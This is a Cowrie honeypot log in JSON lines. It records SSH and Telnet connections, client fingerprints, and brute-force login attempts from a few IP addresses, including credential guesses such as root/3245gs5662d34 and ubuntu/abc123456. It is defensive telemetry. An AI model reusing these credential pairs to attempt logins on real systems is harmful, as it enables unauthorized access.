{"eventid":"cowrie.session.closed","duration":13.507371425628662,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:00.790578Z","src_ip":"212.227.235.229","session":"fdd62e4198de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:38:00.895182Z","src_ip":"212.227.235.229","session":"e5ceaf600ff3"}
{"eventid":"cowrie.session.closed","duration":14.109990119934082,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:01.060103Z","src_ip":"212.227.235.229","session":"6b4afde1c43c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35695,"dst_ip":"1.2.3.4","dst_port":23,"session":"6b598bfeb909","protocol":"telnet","message":"New connection: 212.227.235.229:35695 (1.2.3.4:23) [session: 6b598bfeb909]","sensor":"my-vps","timestamp":"2025-09-09T02:38:01.095625Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35701,"dst_ip":"1.2.3.4","dst_port":23,"session":"12601be4bf02","protocol":"telnet","message":"New connection: 212.227.235.229:35701 (1.2.3.4:23) [session: 12601be4bf02]","sensor":"my-vps","timestamp":"2025-09-09T02:38:01.308144Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:38:01.884241Z","src_ip":"212.227.235.229","session":"e5ceaf600ff3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:03.138141Z","src_ip":"212.227.235.229","session":"e5ceaf600ff3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54438,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a2e8e4481c0","protocol":"ssh","message":"New connection: 212.227.235.229:54438 (1.2.3.4:22) [session: 2a2e8e4481c0]","sensor":"my-vps","timestamp":"2025-09-09T02:38:03.402456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:38:03.404715Z","src_ip":"212.227.235.229","session":"2a2e8e4481c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:38:03.672325Z","src_ip":"212.227.235.229","session":"2a2e8e4481c0"}
{"eventid":"cowrie.session.closed","duration":13.92054533958435,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:04.325820Z","src_ip":"212.227.235.229","session":"524f96c04028"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35737,"dst_ip":"1.2.3.4","dst_port":23,"session":"fabe68eecd77","protocol":"telnet","message":"New connection: 212.227.235.229:35737 (1.2.3.4:23) [session: fabe68eecd77]","sensor":"my-vps","timestamp":"2025-09-09T02:38:04.596391Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:38:04.723575Z","src_ip":"212.227.235.229","session":"2a2e8e4481c0"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:04.986863Z","src_ip":"212.227.235.229","session":"c235cfaf4475"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:04.989940Z","src_ip":"212.227.235.229","session":"2a2e8e4481c0"}
{"eventid":"cowrie.session.closed","duration":14.035422801971436,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:09.017345Z","src_ip":"212.227.235.229","session":"609b2d7c3a04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35866,"dst_ip":"1.2.3.4","dst_port":23,"session":"f072e32af243","protocol":"telnet","message":"New connection: 212.227.235.229:35866 (1.2.3.4:23) [session: f072e32af243]","sensor":"my-vps","timestamp":"2025-09-09T02:38:09.291097Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54848,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c046319f2ea","protocol":"ssh","message":"New connection: 212.227.235.229:54848 (1.2.3.4:22) [session: 3c046319f2ea]","sensor":"my-vps","timestamp":"2025-09-09T02:38:11.230612Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:38:11.231498Z","src_ip":"212.227.235.229","session":"3c046319f2ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:38:11.487083Z","src_ip":"212.227.235.229","session":"3c046319f2ea"}
{"eventid":"cowrie.session.closed","duration":13.4654061794281,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:11.907383Z","src_ip":"212.227.235.229","session":"f23a0e8c61b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35881,"dst_ip":"1.2.3.4","dst_port":23,"session":"5517dd7b9457","protocol":"telnet","message":"New connection: 212.227.235.229:35881 (1.2.3.4:23) [session: 5517dd7b9457]","sensor":"my-vps","timestamp":"2025-09-09T02:38:12.274605Z"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abc123456","message":"login attempt [ubuntu/abc123456] failed","sensor":"my-vps","timestamp":"2025-09-09T02:38:12.542583Z","src_ip":"212.227.235.229","session":"3c046319f2ea"}
{"eventid":"cowrie.session.closed","duration":13.41672396659851,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:12.865484Z","src_ip":"212.227.235.229","session":"b74243f8719a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35891,"dst_ip":"1.2.3.4","dst_port":23,"session":"b6604eb10544","protocol":"telnet","message":"New connection: 212.227.235.229:35891 (1.2.3.4:23) [session: b6604eb10544]","sensor":"my-vps","timestamp":"2025-09-09T02:38:13.164933Z"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:13.800461Z","src_ip":"212.227.235.229","session":"3c046319f2ea"}
{"eventid":"cowrie.session.closed","duration":13.993738889694214,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:15.089279Z","src_ip":"212.227.235.229","session":"6b598bfeb909"}
{"eventid":"cowrie.session.closed","duration":13.973333358764648,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:15.281407Z","src_ip":"212.227.235.229","session":"12601be4bf02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35959,"dst_ip":"1.2.3.4","dst_port":23,"session":"867becce7217","protocol":"telnet","message":"New connection: 212.227.235.229:35959 (1.2.3.4:23) [session: 867becce7217]","sensor":"my-vps","timestamp":"2025-09-09T02:38:15.357210Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36015,"dst_ip":"1.2.3.4","dst_port":23,"session":"74aac8519084","protocol":"telnet","message":"New connection: 212.227.235.229:36015 (1.2.3.4:23) [session: 74aac8519084]","sensor":"my-vps","timestamp":"2025-09-09T02:38:15.676898Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11787,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2097448b554","protocol":"ssh","message":"New connection: 185.152.45.241:11787 (1.2.3.4:22) [session: c2097448b554]","sensor":"my-vps","timestamp":"2025-09-09T02:38:17.421599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:38:17.422386Z","src_ip":"185.152.45.241","session":"c2097448b554"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:38:17.534121Z","src_ip":"185.152.45.241","session":"c2097448b554"}
{"eventid":"cowrie.login.failed","username":"cronjob","password":"cronjob","message":"login attempt [cronjob/cronjob] failed","sensor":"my-vps","timestamp":"2025-09-09T02:38:17.813833Z","src_ip":"185.152.45.241","session":"c2097448b554"}
{"eventid":"cowrie.session.closed","duration":13.571099042892456,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:18.167396Z","src_ip":"212.227.235.229","session":"fabe68eecd77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36047,"dst_ip":"1.2.3.4","dst_port":23,"session":"a125a7e314c3","protocol":"telnet","message":"New connection: 212.227.235.229:36047 (1.2.3.4:23) [session: a125a7e314c3]","sensor":"my-vps","timestamp":"2025-09-09T02:38:18.450497Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:18.859621Z","src_ip":"185.152.45.241","session":"c2097448b554"}
{"eventid":"cowrie.session.closed","duration":13.44460678100586,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:22.735635Z","src_ip":"212.227.235.229","session":"f072e32af243"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36067,"dst_ip":"1.2.3.4","dst_port":23,"session":"5f1101bdb826","protocol":"telnet","message":"New connection: 212.227.235.229:36067 (1.2.3.4:23) [session: 5f1101bdb826]","sensor":"my-vps","timestamp":"2025-09-09T02:38:22.967183Z"}
{"eventid":"cowrie.session.closed","duration":13.723089456558228,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:25.997629Z","src_ip":"212.227.235.229","session":"5517dd7b9457"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36212,"dst_ip":"1.2.3.4","dst_port":23,"session":"f19631acd38e","protocol":"telnet","message":"New connection: 212.227.235.229:36212 (1.2.3.4:23) [session: f19631acd38e]","sensor":"my-vps","timestamp":"2025-09-09T02:38:26.163373Z"}
{"eventid":"cowrie.session.closed","duration":13.619022846221924,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:26.783861Z","src_ip":"212.227.235.229","session":"b6604eb10544"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36224,"dst_ip":"1.2.3.4","dst_port":23,"session":"5887e8e016a2","protocol":"telnet","message":"New connection: 212.227.235.229:36224 (1.2.3.4:23) [session: 5887e8e016a2]","sensor":"my-vps","timestamp":"2025-09-09T02:38:26.977433Z"}
{"eventid":"cowrie.session.closed","duration":13.240700960159302,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:28.917528Z","src_ip":"212.227.235.229","session":"74aac8519084"}
{"eventid":"cowrie.session.closed","duration":13.777855634689331,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:29.135000Z","src_ip":"212.227.235.229","session":"867becce7217"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36232,"dst_ip":"1.2.3.4","dst_port":23,"session":"bd9af3a75e55","protocol":"telnet","message":"New connection: 212.227.235.229:36232 (1.2.3.4:23) [session: bd9af3a75e55]","sensor":"my-vps","timestamp":"2025-09-09T02:38:29.137050Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36235,"dst_ip":"1.2.3.4","dst_port":23,"session":"a585eeac67c7","protocol":"telnet","message":"New connection: 212.227.235.229:36235 (1.2.3.4:23) [session: a585eeac67c7]","sensor":"my-vps","timestamp":"2025-09-09T02:38:29.444232Z"}
{"eventid":"cowrie.session.closed","duration":13.677095174789429,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:32.127486Z","src_ip":"212.227.235.229","session":"a125a7e314c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36254,"dst_ip":"1.2.3.4","dst_port":23,"session":"20fe4d42b7a7","protocol":"telnet","message":"New connection: 212.227.235.229:36254 (1.2.3.4:23) [session: 20fe4d42b7a7]","sensor":"my-vps","timestamp":"2025-09-09T02:38:32.414520Z"}
{"eventid":"cowrie.session.closed","duration":13.009753227233887,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:35.976870Z","src_ip":"212.227.235.229","session":"5f1101bdb826"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36374,"dst_ip":"1.2.3.4","dst_port":23,"session":"aff57eb3eaaa","protocol":"telnet","message":"New connection: 212.227.235.229:36374 (1.2.3.4:23) [session: aff57eb3eaaa]","sensor":"my-vps","timestamp":"2025-09-09T02:38:36.245196Z"}
{"eventid":"cowrie.session.closed","duration":12.749181032180786,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:39.726527Z","src_ip":"212.227.235.229","session":"5887e8e016a2"}
{"eventid":"cowrie.session.closed","duration":13.635406017303467,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:39.798710Z","src_ip":"212.227.235.229","session":"f19631acd38e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36421,"dst_ip":"1.2.3.4","dst_port":23,"session":"08cfe3f37682","protocol":"telnet","message":"New connection: 212.227.235.229:36421 (1.2.3.4:23) [session: 08cfe3f37682]","sensor":"my-vps","timestamp":"2025-09-09T02:38:39.960691Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36423,"dst_ip":"1.2.3.4","dst_port":23,"session":"855c2b2b922e","protocol":"telnet","message":"New connection: 212.227.235.229:36423 (1.2.3.4:23) [session: 855c2b2b922e]","sensor":"my-vps","timestamp":"2025-09-09T02:38:40.105150Z"}
{"eventid":"cowrie.session.closed","duration":13.743247509002686,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:42.880244Z","src_ip":"212.227.235.229","session":"bd9af3a75e55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36442,"dst_ip":"1.2.3.4","dst_port":23,"session":"e4e2c7efdc42","protocol":"telnet","message":"New connection: 212.227.235.229:36442 (1.2.3.4:23) [session: e4e2c7efdc42]","sensor":"my-vps","timestamp":"2025-09-09T02:38:43.104717Z"}
{"eventid":"cowrie.session.closed","duration":13.710213899612427,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:43.154385Z","src_ip":"212.227.235.229","session":"a585eeac67c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36449,"dst_ip":"1.2.3.4","dst_port":23,"session":"264a28e2cf99","protocol":"telnet","message":"New connection: 212.227.235.229:36449 (1.2.3.4:23) [session: 264a28e2cf99]","sensor":"my-vps","timestamp":"2025-09-09T02:38:43.399096Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45856,"dst_ip":"1.2.3.4","dst_port":22,"session":"923ede58b6e6","protocol":"ssh","message":"New connection: 212.227.235.229:45856 (1.2.3.4:22) [session: 923ede58b6e6]","sensor":"my-vps","timestamp":"2025-09-09T02:38:44.969944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:38:44.974769Z","src_ip":"212.227.235.229","session":"923ede58b6e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:38:45.360577Z","src_ip":"212.227.235.229","session":"923ede58b6e6"}
{"eventid":"cowrie.session.closed","duration":13.743311166763306,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:46.157765Z","src_ip":"212.227.235.229","session":"20fe4d42b7a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36502,"dst_ip":"1.2.3.4","dst_port":23,"session":"ef81ed7b2769","protocol":"telnet","message":"New connection: 212.227.235.229:36502 (1.2.3.4:23) [session: ef81ed7b2769]","sensor":"my-vps","timestamp":"2025-09-09T02:38:46.394179Z"}
{"eventid":"cowrie.login.failed","username":"gbase","password":"gbase","message":"login attempt [gbase/gbase] failed","sensor":"my-vps","timestamp":"2025-09-09T02:38:46.923335Z","src_ip":"212.227.235.229","session":"923ede58b6e6"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:48.317507Z","src_ip":"212.227.235.229","session":"923ede58b6e6"}
{"eventid":"cowrie.session.closed","duration":13.874711751937866,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:50.119812Z","src_ip":"212.227.235.229","session":"aff57eb3eaaa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36613,"dst_ip":"1.2.3.4","dst_port":23,"session":"ae4b4756508e","protocol":"telnet","message":"New connection: 212.227.235.229:36613 (1.2.3.4:23) [session: ae4b4756508e]","sensor":"my-vps","timestamp":"2025-09-09T02:38:50.346261Z"}
{"eventid":"cowrie.session.closed","duration":13.064929246902466,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:53.025557Z","src_ip":"212.227.235.229","session":"08cfe3f37682"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36634,"dst_ip":"1.2.3.4","dst_port":23,"session":"5e441a920d83","protocol":"telnet","message":"New connection: 212.227.235.229:36634 (1.2.3.4:23) [session: 5e441a920d83]","sensor":"my-vps","timestamp":"2025-09-09T02:38:53.264181Z"}
{"eventid":"cowrie.session.closed","duration":13.92956805229187,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:54.034651Z","src_ip":"212.227.235.229","session":"855c2b2b922e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36640,"dst_ip":"1.2.3.4","dst_port":23,"session":"ca43cfd8453b","protocol":"telnet","message":"New connection: 212.227.235.229:36640 (1.2.3.4:23) [session: ca43cfd8453b]","sensor":"my-vps","timestamp":"2025-09-09T02:38:54.310755Z"}
{"eventid":"cowrie.session.closed","duration":13.461815357208252,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:56.860844Z","src_ip":"212.227.235.229","session":"264a28e2cf99"}
{"eventid":"cowrie.session.closed","duration":13.965719938278198,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:57.070360Z","src_ip":"212.227.235.229","session":"e4e2c7efdc42"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36754,"dst_ip":"1.2.3.4","dst_port":23,"session":"c55f91f9d9fc","protocol":"telnet","message":"New connection: 212.227.235.229:36754 (1.2.3.4:23) [session: c55f91f9d9fc]","sensor":"my-vps","timestamp":"2025-09-09T02:38:57.086256Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36773,"dst_ip":"1.2.3.4","dst_port":23,"session":"787acb3d0cd0","protocol":"telnet","message":"New connection: 212.227.235.229:36773 (1.2.3.4:23) [session: 787acb3d0cd0]","sensor":"my-vps","timestamp":"2025-09-09T02:38:57.456426Z"}
{"eventid":"cowrie.session.closed","duration":13.376542568206787,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:38:59.770651Z","src_ip":"212.227.235.229","session":"ef81ed7b2769"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36792,"dst_ip":"1.2.3.4","dst_port":23,"session":"05cf671664e2","protocol":"telnet","message":"New connection: 212.227.235.229:36792 (1.2.3.4:23) [session: 05cf671664e2]","sensor":"my-vps","timestamp":"2025-09-09T02:39:00.019995Z"}
{"eventid":"cowrie.session.closed","duration":13.321911811828613,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:03.668105Z","src_ip":"212.227.235.229","session":"ae4b4756508e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36820,"dst_ip":"1.2.3.4","dst_port":23,"session":"25a5e058b512","protocol":"telnet","message":"New connection: 212.227.235.229:36820 (1.2.3.4:23) [session: 25a5e058b512]","sensor":"my-vps","timestamp":"2025-09-09T02:39:04.037910Z"}
{"eventid":"cowrie.session.closed","duration":13.775048732757568,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:07.039165Z","src_ip":"212.227.235.229","session":"5e441a920d83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37808,"dst_ip":"1.2.3.4","dst_port":22,"session":"397defc5eb0c","protocol":"ssh","message":"New connection: 212.227.235.229:37808 (1.2.3.4:22) [session: 397defc5eb0c]","sensor":"my-vps","timestamp":"2025-09-09T02:39:07.186980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:39:07.189487Z","src_ip":"212.227.235.229","session":"397defc5eb0c"}
